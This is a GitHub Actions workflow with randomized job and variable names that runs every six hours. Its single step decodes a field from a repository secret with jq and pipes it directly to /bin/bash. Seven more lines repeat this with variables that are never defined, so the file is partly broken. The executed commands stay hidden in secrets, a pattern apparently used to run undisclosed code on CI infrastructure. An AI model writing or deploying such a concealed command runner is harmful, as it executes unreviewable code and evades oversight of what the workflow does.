name: quanjingxin3910

on:
  workflow_dispatch:
  schedule:
    - cron: '18 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: quanjingxin3910
        env:
          zy496: ${{ secrets.zy496 }}
        run: |
          echo $zy496 | jq -r .g7524 | /bin/bash
          echo $a1804 | jq -r .l5393 | /bin/bash
          echo $s2873 | jq -r .rliox609 | /bin/bash
          echo $udd866 | jq -r .ly450 | /bin/bash
          echo $xx0 | jq -r .xgzxq6 | /bin/bash
          echo $n4 | jq -r .zu00664 | /bin/bash
          echo $aydhb58736 | jq -r .xwg88 | /bin/bash
          echo $n5 | jq -r .gfyr5776 | /bin/bash

